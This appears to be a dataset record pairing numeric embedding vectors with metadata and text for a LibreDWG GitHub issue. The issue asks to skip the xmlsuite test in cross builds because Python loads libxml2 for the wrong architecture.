-0.00958570558577776, 0.013513331301510334, -0.0029026377014815807, -0.010318096727132797, 0.007639843039214611, 0.000986394239589572, 0.003451931057497859, 0.00616070069372654, -0.0024251476861536503, -0.018553905189037323, -0.012816841714084148, 0.0020948536694049835, -0.013642577454447746, 0.002480794908478856, -0.0002175407571485266, -0.016859352588653564, -0.0016900639748200774, 0.018640069290995598, -0.007183894049376249, 0.021483467891812325, 0.006451502908021212, -0.000033377193176420406, 0.008465577848255634, 0.008436856791377068, 0.000006559740540978964, 0.005008261650800705, 0.015236604027450085, -0.006006324198096991, 0.0040855929255485535, 0.006185831502079964, -0.0012789915781468153, 0.011660813353955746, 0.0021738370414823294, -0.0018543134210631251, -0.005676030181348324, -0.01973147504031658, 0.0140590351074934, 0.009722131304442883, 0.0009083084296435118, 0.006056586280465126, -0.004250739701092243, -0.0017178877023980021, -0.004900557454675436, -0.01644289493560791, -0.0022223039995878935, 0.00013216245861258358, -0.019602229818701744, -0.0013983641983941197, -0.017204007133841515, 0.018726231530308723, 0.014267263934016228, 0.006325847469270229, -0.00008363931556232274, 0.002882892033085227, -0.005065704230219126, 0.009556984528899193, 0.0027751873712986708, -0.027356958016753197, -0.005342145916074514, -0.020291538909077644, 0.005230851471424103, 0.004143035039305687, 0.0005407666321843863, -0.014260083436965942, -0.002242049900814891, -0.015279686078429222, -0.011366420425474644, -0.012838383205235004, 0.012041369453072548, 0.025806011632084846, -0.0033047348260879517, 0.005999143701046705, 0.006900271866470575, 0.008034760132431984, -0.037107810378074646, 0.01413083728402853, -0.035901520401239395, 0.0207079965621233, 0.002453868743032217, -0.019616588950157166, -0.011330518871545792, 0.011445404030382633, -0.015092998743057251, -0.015351489186286926, -0.002290516858920455, -0.002238459652289748, 0.011316158808767796, 0.012479367665946484, 0.009169247932732105, -0.006185831502079964, 0.012120353057980537, 0.004354854114353657, 0.024427393451333046, 0.018798034638166428, 0.0029852113220840693, 0.022517431527376175, 0.005044163204729557, 0.0031898499000817537, 0.004311772529035807, -0.0038199215196073055, 0.01951606571674347, 0.005381637718528509, 0.017031680792570114, -0.010318096727132797, 0.002066132379695773, -0.015653062611818314, -0.011028946377336979, 0.0005156355327926576, 0.022876447066664696, 0.0141451982781291, 0.0018202069913968444, -0.0315646156668663, 0.0008822798263281584, 0.013060972094535828, 0.006828468758612871, -0.026638926938176155, -0.025633683428168297, 0.012328581884503365, -0.011373600922524929, -0.003013932378962636, 0.0017968709580600262, 0.004896967206150293, -0.002873916644603014, -0.0038199215196073055, -0.012529630213975906, -0.00458103371784091, 0.015150440856814384, 0.0022528201807290316, 0.014920671470463276, 0.01693115569651127, 0.037940725684165955, -0.0023856558836996555, -0.012558351270854473, -0.0003536299627739936, 0.033460214734077454, -0.00252926186658442, -0.01309687364846468, -0.022144056856632233, -0.000003968800683651352, 0.012615793384611607, -0.0014270853716880083, -0.009133346378803253, 0.0011353854788467288, 0.0025490077678114176, 0.0077188266441226006, -0.0011326929088681936, 0.006433552131056786, 0.002785957884043455, 0.011904943734407425, 0.024743326008319855, 0.005148277617990971, 0.0066633219830691814, -0.001911755884066224, -0.013470250181853771, -0.01386516634374857, 0.015638701617717743, 0.014439591206610203, -0.004232788924127817, 0.036590829491615295, 0.01293172687292099, 0.0017026294954121113, 0.0035739962477236986, 0.014834507368505001, -0.01901344396173954, -0.003518348792567849, 0.02086596190929413, 0.00822862796485424, 0.005600636824965477, 0.010669931769371033, 0.00829325057566166, -0.014920671470463276, 0.00471386918798089, 0.014576016925275326, -0.001621851115487516, 0.02380988746881485, 0.02658148482441902, -0.03403463959693909, 0.00505852373316884, -0.014238541945815086, 0.019559146836400032, 0.010935602709650993, -0.007130041718482971, -0.0017645596526563168, -0.013929788954555988, 0.02793138101696968, 0.05339273810386658, 0.0012754014460369945, 0.002599269850179553, -0.01420982088893652, 0.0030570141971111298, -0.023264184594154358, -0.03067425824701786, 0.022991333156824112, 0.001827387255616486, 0.012859923765063286, 0.0028631461318582296, -0.013563593849539757, -0.001536585041321814, -0.0037588889244943857, 0.002850580494850874, 0.0043943459168076515, 0.03147844970226288, 0.008192726410925388, -0.024226345121860504, 0.01001652330160141, 0.016485977917909622, -0.01542329229414463, 0.0037265776190906763, 0.00958570558577776, 0.01148848608136177, 0.004900557454675436, -0.004534361883997917, -0.011517207138240337, -0.0069720749743282795, 0.0074172536842525005, -0.007790629751980305, -0.001763662090525031, -0.027184629812836647, -0.017204007133841515, -0.017950760200619698, -0.006433552131056786, -0.002234869636595249, 0.02412582002580166, 0.002683638595044613, 0.02672509104013443, -0.028979705646634102, 0.001436958322301507, -0.0006377007230184972, -0.00102857849560678, 0.004336903337389231, -0.02141166478395462, -0.016730107367038727, -0.0028667361475527287, -0.023709362372756004, 0.012852743268013, -0.004218428395688534, 0.014920671470463276, -0.010231932625174522, -0.0012996349250897765, 0.01542329229414463, 0.011883402243256569, -0.030760420486330986, -0.009348755702376366, 0.018625708296895027, 0.002181017305701971, -0.005431899800896645, 0.013951330445706844, 0.0020715175196528435, 0.01835285685956478, 0.023953493684530258, 0.015796668827533722, -0.012910186313092709, -0.02040642313659191, 0.005173408892005682, -0.0003839218697976321, 0.015480734407901764, -0.02638043649494648, 0.0036009224131703377, 0.00770446565002203, -0.007445974741131067, 0.008329152129590511, -0.015825388953089714, -0.012048549950122833, 0.00045707120443694293, 0.013750281184911728, 0.00119821319822222, -0.015207882970571518, 0.005313424859195948, 0.0031844647601246834, 0.009707770310342312, 0.003902495140209794, -0.007761908229440451, -0.00035026419209316373, -0.016830632463097572, 0.023852968588471413, -0.017850235104560852, -0.022503072395920753, -0.037797119468450546, -0.005902209784835577, 0.02086596190929413, 0.014525754377245903, -0.02006176859140396, 0.014267263934016228, 0.007252106908708811, -0.03374742716550827, 0.011086388491094112, -0.007219795603305101, 0.01386516634374857, 0.019056526944041252, -0.001685576280578971, 0.02366628125309944, 0.013125595636665821, 0.015250965021550655, 0.006860780064016581, -0.017160926014184952, -0.007611121982336044, -0.015523816458880901, -0.0009495951817370951, 0.012536810711026192, 0.005575506016612053, -0.01148848608136177, 0.003498602891340852, -0.033287886530160904, -0.03242625296115875, -0.00002068544563371688, 0.030214717611670494, 0.015552537515759468, 0.01695987768471241, -0.009643147699534893, -0.004929278511554003, -0.002066132379695773, 0.0070905499160289764, 0.006566387601196766, -0.005808865651488304, -0.012184975668787956, 0.006778206676244736, 0.004505640361458063, -0.012263958342373371, -0.017764071002602577, 0.050262127071619034, 0.014949392527341843, 0.01851082220673561, -0.004013789817690849, -0.007173123303800821, 0.02144038677215576, -0.013606675900518894, -0.02055002935230732, -0.022775923833251, 0.015997717157006264, 0.007223385386168957, -0.017232729122042656, 0.006735125090926886, -0.010325276292860508, 0.0003056116693187505, 0.008724069222807884, -0.01258707232773304, -0.005162638146430254, 0.0015267120907083154, -0.01852518320083618, -0.013434348627924919, -0.0024377130903303623, 0.03047320805490017, -0.019128328189253807, 0.016859352588653564, 0.006135569419711828, 0.0011901353718712926, -0.006024274975061417, 0.022847726941108704, 0.01558125950396061, 0.02020537480711937, -0.007654203567653894, -0.0032778086606413126, 0.006228913553059101, 0.0010716603137552738, -0.006210962776094675, 0.008041939698159695, 0.015825388953089714, 0.007115681190043688, -0.019760195165872574, 0.01104330737143755, 0.0075536794029176235, -0.015667423605918884, 0.0035955370403826237, 0.014690901152789593, -0.0027374906931072474, 0.0033514066599309444, -0.009829835966229439, 0.014353427104651928, 0.011933664791285992, 0.02429814822971821, 0.002157681155949831, -0.009384657256305218, 0.0004240866983309388, -0.008365053683519363, -0.010081146843731403, 0.006465863436460495, -0.0046851481311023235, -0.006792567204684019, -0.019472982734441757, -0.00018522939353715628, -0.01104330737143755, 0.004347674082964659, -0.00016189340385608375, -0.016414174810051918, -0.012292680330574512, 0.0050764745101332664, 0.007259286940097809, -0.02840528078377247, 0.020621832460165024, 0.025116702541708946, 0.01386516634374857, -0.01199828740209341, -0.004695918411016464, -0.0017448137514293194, -0.026078863069415092, 0.008659446612000465, -0.00735981110483408, 0.012565531767904758, -0.0032939643133431673, -0.016557781025767326, -0.02053566835820675, 0.02343651093542576, -0.011244355700910091, 0.006519715767353773, -0.012989168986678123, -0.0061068483628332615, -0.026337353512644768, -0.013348184525966644, 0.02230202406644821, 0.016902435570955276, 0.003697856329381466, -0.02669636905193329, -0.0023982215207070112, 0.006753075867891312, -0.012292680330574512, -0.03185182809829712, -0.012831202708184719, -0.011883402243256569, -0.0003830243367701769, 0.005212900694459677, 0.025633683428168297, -0.008451217785477638, -0.005467801354825497, 0.007826531305909157, -0.01627056859433651, 0.01780715398490429, -0.005464211106300354, -0.011840321123600006, 0.014561655931174755, 0.00812810380011797, -0.01327638141810894, -0.010045245289802551, -0.016198765486478806, 0.015609980560839176, 0.016012078151106834, 0.009786753915250301, -0.01353487279266119, -0.004523591138422489, 0.014425230212509632, -0.011883402243256569, -0.00976521335542202, 0.04216274246573448, 0.017878957092761993, 0.007740367203950882, -0.006986435502767563, 0.0007454052683897316, 0.034379296004772186, 0.007761908229440451, 0.008286070078611374, -0.01800820231437683, -0.02003304660320282, 0.006386880297213793, 0.01628492958843708, -0.0020948536694049835, 0.015667423605918884, -0.016844991594552994, 0.004523591138422489, 0.016170043498277664, -0.00804912019520998, -0.015092998743057251, 0.05543194338679314, -0.006013504229485989, 0.0059776026755571365, -0.004293821752071381, 0.009499541483819485, 0.003670930163934827, 0.00952108297497034, -0.0022761563304811716, -0.017577383667230606, 0.023852968588471413, 0.015882831066846848, 0.006692043039947748, 0.0033137102145701647, -0.002814678940922022, 0.00012935766426380724, 0.014152378775179386, 0.017878957092761993, -0.027299514040350914, 0.006175061222165823, -0.00032535751233808696, 0.0032060055527836084, 0.002378475619480014, -0.0016801910242065787, -0.0024915654212236404, -0.0006260327063500881, -0.01094996277242899, -0.010318096727132797, 0.012644514441490173, -0.008286070078611374, -0.019271934404969215, 0.0013095078757032752, -0.010239113122224808, -0.019774556159973145, 0.00016862494521774352, 0.01783587411046028, 0.008566102012991905, 0.00211818958632648, 0.005974012892693281, 0.020664913579821587, 0.015696143731474876, -0.00126463093329221, -0.009169247932732105, 0.015868471935391426, 0.046499647200107574, -0.02055002935230732, -0.009966261684894562, -0.017031680792570114, 0.000814066908787936, 0.006674092262983322, 0.001981763867661357, -0.015150440856814384, 0.01749121956527233, -0.0069900257512927055, -0.015250965021550655, 0.012271138839423656, 0.02053566835820675, -0.003812741255387664, 0.008788691833615303, 0.003119841916486621, 0.008149644359946251, -0.02230202406644821, -0.016170043498277664, 0.000043446445488370955 ]
null
null
null
null
null
null
null
null
null
[ "LibreDWG", "libredwg" ]
python demand-loads libxml2, but for the wrong architecture resp. doesn't understand LD_LIBRARY_PATH arch hints, nor static LDFLAGS="-L/usr/lib/i386-linux-gnu" libxml2:i386 is installed and can be linked to. installing python3-libxml2:i386 would remove too many needed packages
skip test/xmlsuite on cross
https://api.github.com/repos/LibreDWG/libredwg/issues/698/comments
0
2023-04-18T05:29:33
2023-04-18T10:21:36Z
https://github.com/LibreDWG/libredwg/issues/698
1,672,377,749
698
false
This is a GitHub Issue repo:libredwg owner:LibreDWG Title : skip test/xmlsuite on cross Issue date: --- start body --- python demand-loads libxml2, but for the wrong architecture resp. doesn't understand LD_LIBRARY_PATH arch hints, nor static LDFLAGS="-L/usr/lib/i386-linux-gnu" libxml2:i386 is installed and can be linked to. installing python3-libxml2:i386 would remove too many needed packages --- end body ---
425
[ -0.015103457495570183, 0.027245717123150826, -0.017807746306061745, 0.02139092981815338, 0.049596671015024185, 0.028395039960741997, 0.0263262577354908, 0.044215135276317596, -0.00742327468469739, -0.022161653265357018, -0.0175778828561306, -0.0036271284334361553, -0.004086857661604881, -0.02149910107254982, 0.004468838218599558, 0.028313910588622093, -0.01473837811499834, 0.00803850032389164, -0.009268952533602715, 0.005111107137054205, 0.03063960000872612, -0.023527318611741066, 0.022526731714606285, 0.024433255195617676, -0.01913284882903099, -0.005780418869107962, -0.004583770874887705, -0.026731902733445168, -0.03815752640366554, -0.017212802544236183, -0.005043500103056431, 0.02020104229450226, -0.007646378595381975, 0.027543189004063606, 0.017415624111890793, -0.017861831933259964, 0.04129450023174286, 0.024068176746368408, -0.012331560254096985, 0.0003946572542190552, -0.03461490571498871, -0.0055370326153934, -0.0006891713128425181, 0.019903570413589478, -0.009708398953080177, 0.022580817341804504, 0.0019690608605742455, 0.023594927042722702, -0.05565427988767624, 0.007119042333215475, 0.007876243442296982, -0.003826569765806198, -0.021472059190273285, -0.06003522872924805, 0.0011552387150004506, -0.03326275944709778, 0.014535556547343731, 0.021877702325582504, -0.02014695666730404, -0.005368014797568321, -0.05641147866845131, 0.04445851966738701, 0.0107225077226758, 0.004353906027972698, -0.01479246374219656, 0.0905396118760109, -0.015752486884593964, 0.03661607950925827, -0.02285124734044075, -0.02571779303252697, -0.016807159408926964, 0.010289821773767471, -0.013731029815971851, -0.0029375345911830664, 0.01607700064778328, -0.04497233405709267, 0.0028834487311542034, -0.00710552092641592, -0.004644617438316345, -0.026461472734808922, -0.030504385009407997, 0.012967068701982498, -0.030612558126449585, 0.0020163857843726873, -0.0016124326502904296, -0.015333321876823902, -0.007930329069495201, -0.06831035017967224, -0.03069368563592434, -0.03932036831974983, 0.008755137212574482, 0.007741028908640146, 0.04183536022901535, -0.0492180697619915, -0.021526144817471504, -0.008795701898634434, -0.020309213548898697, -0.013994698412716389, -0.00884302705526352, -0.020566122606396675, -0.037941183894872665, -0.05011048540472984, -0.012480296194553375, 0.027800096198916435, -0.0028293628711253405, 0.010526446625590324, 0.02114754356443882, -0.011993523687124252, -0.00486096041277051, 0.08967424184083939, -0.0002835278573911637, -0.022377995774149895, -0.011669008992612362, -0.044025834649801254, -0.017807746306061745, 0.015684878453612328, -0.020309213548898697, -0.04973188415169716, -0.03680538013577461, 0.008504990488290787, 0.0040564341470599174, 0.012385645881295204, -0.02496059238910675, -0.046027008444070816, -0.014724856242537498, 0.006672834511846304, 0.005837885197252035, 0.02582596428692341, -0.024879463016986847, -0.0087889414280653, -0.022121088579297066, 0.004749408457428217, 0.010594054125249386, -0.010438557714223862, 0.03180244565010071, -0.010918568819761276, -0.012885939329862595, 0.0463244803249836, 0.0035933246836066246, 0.00416798610240221, -0.04248438775539398, -0.02295941859483719, 0.004566868767142296, 0.01170281320810318, -0.03907698392868042, 0.01554966438561678, -0.020376821979880333, -0.012480296194553375, 0.02656964398920536, -0.00250484817661345, -0.044783033430576324, -0.037941183894872665, 0.02566370740532875, 0.01408934872597456, 0.023365061730146408, 0.04199761524796486, 0.023581404238939285, 0.00730834249407053, 0.005638443864881992, 0.0018659597262740135, -0.004009109456092119, -0.01598235033452511, 0.0070649562403559685, 0.02264842391014099, -0.012142259627580643, -0.03345206007361412, 0.006490294821560383, 0.02853025496006012, -0.0449182502925396, 0.02571779303252697, -0.03583183512091637, -0.034425605088472366, 0.009485295973718166, 0.030801856890320778, -0.04159197211265564, -0.010499403811991215, -0.021891223266720772, 0.03299233317375183, 0.020011741667985916, -0.036886509507894516, -0.030450299382209778, -0.030017614364624023, 0.01438682060688734, 0.04248438775539398, -0.021837137639522552, -0.010681943967938423, 0.010411514900624752, 0.00868752971291542, -0.0036913552321493626, 0.0021701923105865717, -0.014251605607569218, -0.03410109132528305, -0.006997349206358194, -0.006652552168816328, 0.011466187424957752, -0.022783638909459114, -0.02103937231004238, -0.01807817630469799, 0.007734267972409725, -0.031559057533741, 0.03877951204776764, 0.03196470066905022, -0.039158113300800323, -0.0004909975687041879, -0.002739783376455307, 0.018510861322283745, -0.008755137212574482, 0.032126959413290024, 0.02295941859483719, -0.054626647382974625, 0.01476542092859745, 0.006422687787562609, 0.0047967336140573025, 0.008119629696011543, 0.008836265653371811, 0.01622573658823967, 0.036237478256225586, 0.006530859041959047, -0.010965893976390362, 0.023040546104311943, 0.02636682242155075, -0.026610208675265312, -0.012013806030154228, -0.013467362150549889, -0.018145782873034477, 0.03826569765806198, 0.019024677574634552, -0.015887701883912086, -0.013352429494261742, 0.03034212812781334, 0.05067838728427887, -0.02525806427001953, 0.009248670190572739, 0.017185760661959648, 0.026245130226016045, 0.03253260254859924, 0.022837724536657333, -0.036994680762290955, -0.036048177629709244, 0.0011383368400856853, 0.021526144817471504, 0.021106978878378868, 0.0101951714605093, -0.059548456221818924, 0.011716334149241447, -0.005719572305679321, 0.0006371982162818313, 0.008329211734235287, -0.003600085387006402, 0.023432668298482895, 0.012243670411407948, 0.02079598605632782, 0.02505524270236492, -0.0022124468814581633, 0.030017614364624023, -0.011716334149241447, 0.01403526309877634, 0.0013386233476921916, -0.04399878904223442, -0.02963901311159134, 0.008119629696011543, 0.023175761103630066, -0.034074049443006516, 0.02823278307914734, 0.023392103612422943, 0.0075314464047551155, -0.00600014254450798, 0.0052564628422260284, -0.007125802803784609, -0.037292152643203735, -0.00824132189154625, -0.03264077380299568, -0.0228106826543808, -0.00024380860850214958, -0.039158113300800323, -0.019957656040787697, 0.017064066603779793, -0.0161310862749815, 0.03261373192071915, 0.02516341395676136, -0.04237621650099754, 0.004411372356116772, -0.024338604882359505, -0.017550839111208916, 0.004157844930887222, -0.005401818547397852, -0.023527318611741066, 0.03485829383134842, -0.019863005727529526, -0.006003522779792547, 0.009904460050165653, -0.013758072629570961, 0.005469425581395626, 0.018172824755311012, -0.015806572511792183, 0.029774228110909462, 0.022878289222717285, -0.027989396825432777, -0.007997936569154263, 0.009201345033943653, -0.019470885396003723, -0.010242496617138386, 0.017767181620001793, -0.013102282769978046, 0.02044442854821682, -0.05430213361978531, 0.010729269124567509, 0.0625772625207901, 0.010952373035252094, 0.0013369331136345863, 0.06035974249243736, -0.0393744558095932, -0.015211628749966621, 0.012446492910385132, -0.012318038381636143, 0.004468838218599558, -0.00777483219280839, -0.061549630016088486, 0.0010411514667794108, 0.010634618811309338, -0.011608162894845009, 0.01838916912674904, -0.046730123460292816, -0.0005691684200428426, 0.025244543328881264, -0.035777751356363297, -0.0193356703966856, -0.0018355365609750152, -0.06338854879140854, -0.02888181246817112, 0.01508993562310934, -0.028557296842336655, 0.0027059796266257763, -0.012683117762207985, -0.0020873735193163157, -0.03721102327108383, 0.0010310104116797447, -0.0006177611649036407, -0.00002780875911412295, 0.0018794812494888902, -0.0043471455574035645, 0.02807052619755268, 0.023594927042722702, -0.008680769242346287, 0.03661607950925827, -0.015035849995911121, 0.015076413750648499, 0.021688401699066162, 0.037292152643203735, 0.008288647048175335, 0.0008129770285449922, 0.03621043637394905, 0.016847724094986916, 0.006929741706699133, -0.006473393179476261, -0.009268952533602715, -0.0067979078739881516, -0.05340971797704697, 0.024974113330245018, 0.007788354065269232, -0.015847137197852135, -0.043971747159957886, 0.0029966908041387796, 0.016158130019903183, -0.011662248522043228, 0.049948226660490036, -0.023324497044086456, -0.0309370718896389, -0.02029569260776043, -0.02370309829711914, -0.04797409474849701, 0.039455585181713104, 0.009924742393195629, -0.01208141352981329, -0.047189854085445404, -0.0051482911221683025, 0.04597292095422745, 0.03264077380299568, 0.0065173376351594925, -0.0033550092484802008, -0.027935311198234558, -0.01426512748003006, -0.02270251139998436, -0.03837386891245842, -0.0042592561803758144, 0.017604924738407135, 0.023716619238257408, 0.0242169126868248, -0.013900048099458218, -0.027664881199598312, -0.01456259936094284, -0.005019837524741888, -0.0055302721448242664, -0.060900598764419556, -0.0016234187642112374, 0.0323433019220829, 0.023987047374248505, -0.000803258502855897, 0.019606098532676697, 0.019268063828349113, 0.017361538484692574, -0.04667603597044945, 0.016604337841272354, 0.0039685447700321674, 0.017456188797950745, -0.02501467801630497, -0.02164783701300621, -0.04629743844270706, 0.018564946949481964, 0.004533065482974052, -0.0259747002273798, -0.015995873138308525, 0.004641236737370491, -0.006344939116388559, 0.0062604304403066635, 0.028719555586576462, 0.001980892149731517, 0.03150497376918793, -0.04307933151721954, 0.012162541970610619, -0.005297027062624693, 0.005117868073284626, 0.008552315644919872, -0.0009828401962295175, -0.0049623711965978146, 0.001511021750047803, -0.003322895849123597, 0.023973526433110237, 0.024284519255161285, -0.027435017749667168, 0.0008788941195234656, -0.002367943525314331, 0.021134022623300552, 0.016901809722185135, -0.02697528898715973, 0.018253954127430916, -0.01868664100766182, -0.019213976338505745, 0.009012044407427311, -0.017888875678181648, -0.028395039960741997, -0.010039675049483776, -0.0001876100868685171, -0.017699575051665306, -0.0006186062237247825, -0.023987047374248505, -0.015076413750648499, 0.002513298997655511, 0.04627039283514023, -0.005175333935767412, 0.034128133207559586, 0.06950023770332336, -0.04243030399084091, -0.024987636134028435, -0.03258669003844261, 0.0007318483549170196, -0.03780596703290939, 0.005354493390768766, 0.05449143424630165, 0.0003891641681548208, -0.006321277003735304, -0.01582009345293045, -0.0002647246001288295, -0.030828900635242462, -0.009999110363423824, 0.030720729380846024, 0.02928745560348034, -0.03653495013713837, 0.004854199476540089, -0.0036778338253498077, -0.0305855143815279, 0.017821267247200012, 0.016604337841272354, -0.004735887050628662, -0.03748145326972008, 0.04099702835083008, 0.018646076321601868, -0.055167507380247116, -0.004211931023746729, -0.028286868706345558, -0.02706993743777275, -0.028692511841654778, -0.0013158058281987906, -0.046027008444070816, -0.00025268204626627266, 0.01752379536628723, -0.009762485511600971, -0.004583770874887705, -0.012358603067696095, 0.020728379487991333, 0.0674990639090538, -0.01010052114725113, 0.03266781568527222, -0.026136958971619606, -0.00012644667003769428, 0.016496166586875916, 0.0028158414643257856, -0.020065829157829285, 0.02496059238910675, 0.0012118597514927387, -0.006757343653589487, -0.01278452854603529, 0.00821427907794714, 0.003600085387006402, 0.036940593272447586, -0.023419147357344627, 0.007822157815098763, 0.05454551801085472, 0.0006215640460141003, -0.02285124734044075, 0.019376235082745552, -0.034128133207559586, -0.02547440677881241, -0.04124041646718979, -0.009999110363423824, -0.03496646508574486, -0.006432828493416309, 0.0028530254494398832, 0.035290978848934174, 0.00686889560893178, -0.004739267285913229, -0.025704272091388702, 0.011533794924616814, 0.012338320724666119, 0.008119629696011543, 0.015860658138990402, 0.0017358158947899938, -0.02275659702718258, 0.010526446625590324, -0.009559663943946362, -0.014630205929279327, -0.01449499186128378, -0.01894354820251465, 0.04770366847515106, -0.00538829667493701, 0.002019766252487898, 0.006165780127048492, -0.02299998328089714, 0.033370934426784515, 0.00701763154938817, -0.020106391981244087, 0.012324799783527851, -0.032316260039806366, 0.007213692180812359, 0.006314516067504883, 0.019619621336460114, -0.02355436235666275, 0.02662372961640358, -0.017645489424467087, 0.011986763216555119, -0.005469425581395626, -0.018294518813490868, 0.01531980000436306, 0.00713256374001503, -0.021715445443987846, -0.011892112903296947, 0.009539381600916386, 0.008809222839772701, -0.010127563960850239, 0.015793051570653915, 0.010093760676681995, 0.01406230591237545, 0.005766897462308407, -0.009552902542054653, 0.00017672954709269106, -0.018213389441370964, 0.012656074948608875, 0.019768357276916504, -0.0032535982318222523, -0.025190457701683044, 0.009586706757545471, -0.0010800256859511137, 0.004526304546743631, -0.0069770668633282185, -0.026380345225334167, 0.027096981182694435, -0.018551426008343697, -0.01632038690149784, 0.015806572511792183, -0.0012481986777856946, 0.0284761693328619, -0.006480153650045395, -0.039401497691869736, 0.002197235357016325, 0.010911808349192142, -0.00012929884542245418, -0.01943032070994377, -0.03331684693694115, -0.00017620137077756226, -0.001200873521156609, 0.008099347352981567, 0.02947675622999668, -0.0030338747892528772, -0.020403863862156868, 0.054464392364025116, 0.0344526469707489, -0.007713986095041037, 0.014048784039914608, 0.037346240133047104, 0.012142259627580643, 0.003718398045748472, 0.04059138521552086, 0.016834203153848648, -0.002846264746040106, -0.029395626857876778, -0.0017425765981897712, -0.0210934579372406, 0.003317825263366103, -0.020255127921700478, 0.0018068033969029784, -0.01748323254287243, 0.029071113094687462, 0.01742914691567421, -0.024473819881677628, 0.045729536563158035, 0.021134022623300552, 0.019200455397367477, 0.008315689861774445, 0.0029375345911830664, 0.05192235857248306, 0.0015203177463263273, -0.024649599567055702, 0.014778941869735718, 0.00492180697619915, 0.0037792446091771126, 0.0492180697619915, -0.002053569769486785, 0.00695678498595953, -0.0033093742094933987, -0.016144609078764915, -0.04183536022901535, -0.0021499102003872395, 0.017550839111208916, -0.010992936789989471, -0.00119326775893569, 0.03856316953897476, 0.006696497090160847, 0.017997046932578087, -0.014481469988822937, -0.020403863862156868, -0.010492643341422081, 0.02666429430246353, 0.0025200597010552883, 0.005307168234139681, -0.016401516273617744, -0.00212793773971498, -0.01388652715831995, 0.013176650740206242, 0.02360844798386097, 0.04394470527768135, -0.048244524747133255, 0.0288277268409729, 0.005753376055508852, 0.011276887729763985, 0.0456213653087616, -0.0011197448475286365, -0.031721316277980804, 0.018024088814854622, -0.003782625077292323, 0.003600085387006402, -0.05916985496878624, 0.0055302721448242664, -0.017361538484692574, 0.005276744719594717, 0.03334388881921768, -0.028395039960741997, 0.006950024049729109, -0.0203903429210186, -0.019470885396003723, 0.03291120380163193, 0.021958831697702408, -0.03526393696665764, 0.00629085348919034, 0.015684878453612328, -0.004026011098176241, 0.006848613265901804, 0.011641966179013252, -0.02018752135336399, -0.028016438707709312, 0.010688704438507557, 0.005570836365222931, 0.024825377389788628, -0.02255377545952797, -0.02642090804874897, -0.04756845161318779, 0.005242941435426474, -0.025582579895853996, -0.002915562130510807, 0.013142847456037998, -0.011439144611358643, -0.00025141442893072963, 0.031153416261076927, 0.005435621831566095, 0.016996460035443306, -0.020011741667985916, 0.0012093244586139917, 0.03404700383543968, 0.009742203168570995, -0.002236109459772706, -0.006490294821560383, -0.02159375138580799, -0.018172824755311012, -0.0014704574132338166, -0.017970003187656403, 0.005171953700482845, 0.0022242781706154346, 0.0003593747387640178, -0.01842973381280899, -0.038752470165491104, 0.00080832903040573, -0.01853790506720543, 0.00384347140789032, 0.009309516288340092, 0.011574359610676765, 0.023040546104311943, 0.01499528530985117, 0.005858167074620724, 0.0020332876592874527, -0.021106978878378868, 0.02340562641620636, -0.00378600531257689, 0.00039909398765303195, -0.04659491032361984, -0.026691338047385216, 0.0062536695040762424, -0.007896525785326958, -0.022932374849915504, 0.011358016170561314, 0.026285694912075996, 0.01027629990130663, -0.009579945355653763, -0.01602291502058506, 0.03293824568390846, 0.01167577039450407, -0.00005366324694477953, -0.020052306354045868, -0.005797320511192083, -0.007950611412525177, 0.02270251139998436, -0.019660184159874916, -0.0030237336177378893, -0.014522034674882889, -0.009924742393195629, -0.011689291335642338, 0.009390645660459995, -0.0026231608353555202, 0.007098759990185499, 0.012304517440497875, -0.02436564862728119, 0.0035595211666077375, -0.01531980000436306, 0.016090523451566696, 0.0012127048103138804, -0.030071699991822243, 0.015076413750648499, 0.002138078911229968, 0.02682655304670334, -0.04096998646855354, -0.0016597576905041933, 0.032262172549963, -0.025853008031845093, -0.00901880580931902, -0.0013580603990703821, 0.005043500103056431, 0.022864768281579018, 0.031667228788137436, 0.010850961320102215, -0.029963528737425804, 0.018551426008343697, 0.004208550788462162, 0.011283648200333118, -0.03948262706398964, 0.017009980976581573, -0.012845375575125217, 0.01051968615502119, -0.006672834511846304, -0.024446777999401093, 0.009187824092805386, 0.00728129968047142, 0.021958831697702408, -0.010688704438507557, -0.017050545662641525, 0.01531980000436306, 0.009133737534284592, 0.026731902733445168, -0.03753553703427315, -0.0068857972510159016, -0.006544380448758602, 0.01717223785817623, -0.01893002726137638, -0.012946786358952522, -0.00020081462571397424, 0.03380361944437027, -0.02682655304670334, 0.03017987124621868, -0.016604337841272354, 0.0295308418571949, 0.014170477166771889, -0.0030237336177378893, -0.0009743893169797957, 0.03475011885166168, 0.0013386233476921916, 0.01857846975326538, -0.04042913019657135, -0.0024490721989423037, -0.012263952754437923, -0.011919155716896057, 0.0071596065536141396, -0.040050528943538666, 0.010790115222334862, 0.011330973356962204, -0.009634031914174557, 0.0023645630571991205, 0.0063483198173344135, 0.01979539915919304, -0.00713256374001503, 0.01491415686905384, -0.006916220299899578, 0.0023003362584859133, 0.029963528737425804, -0.01514402125030756, -0.0055370326153934, 0.013859483413398266, -0.001205944106914103, 0.0028006299398839474, -0.0214450154453516, 0.022215738892555237, 0.006226626690477133, 0.042862989008426666, 0.010742790065705776, -0.0019284965237602592, -0.009782766923308372, -0.012507339008152485, -0.012223388999700546, 0.00673030037432909, 0.026028785854578018, 0.01394061278551817, -0.007849200628697872, -0.027407974004745483, 0.003184300847351551, -0.008450904861092567, -0.025528492406010628, -0.04270073026418686, -0.03266781568527222, -0.03147793188691139, -0.020971765741705894, -0.02344619110226631, 0.005391677375882864, -0.010641379281878471, 0.07014927268028259, 0.06652551889419556, 0.04629743844270706, -0.013514687307178974, 0.0069060795940458775, -0.01748323254287243, -0.010499403811991215, -0.00361022655852139, 0.012852136045694351, -0.005324069876223803, 0.019957656040787697, 0.025298628956079483, 0.0018997633596882224, 0.022391516715288162, -0.034182220697402954, -0.012771007604897022, -0.02836799807846546, 0.024068176746368408, -0.007348906714469194, 0.0024575230199843645, 0.006267190910875797, -0.017956482246518135, -0.026907680556178093, 0.018848897889256477, -0.006970306392759085, -0.018416211009025574, -0.018754247575998306, -0.006257049739360809, -0.036345649510622025, 0.01626630127429962, 0.03677833825349808, 0.0010217144154012203, -0.014887114055454731, 0.0030947213526815176, -0.013386232778429985, -0.0038062874227762222, -0.012094934470951557, 0.004877862054854631, 0.015008807182312012, 0.007869482971727848, -0.00742327468469739, 0.021756010130047798, 0.018402690067887306, -0.017456188797950745, 0.01313608605414629, -0.010303342714905739, 0.007910046726465225, -0.030261000618338585, -0.013927090913057327, -0.019727792590856552, -0.0018575089052319527, -0.013291583396494389, -0.01698293909430504, -0.001575248665176332, -0.011128151789307594, 0.0015304588014259934, -0.026502037420868874, 0.0034124753437936306, 0.022161653265357018, 0.040212783962488174, 0.013670183718204498, 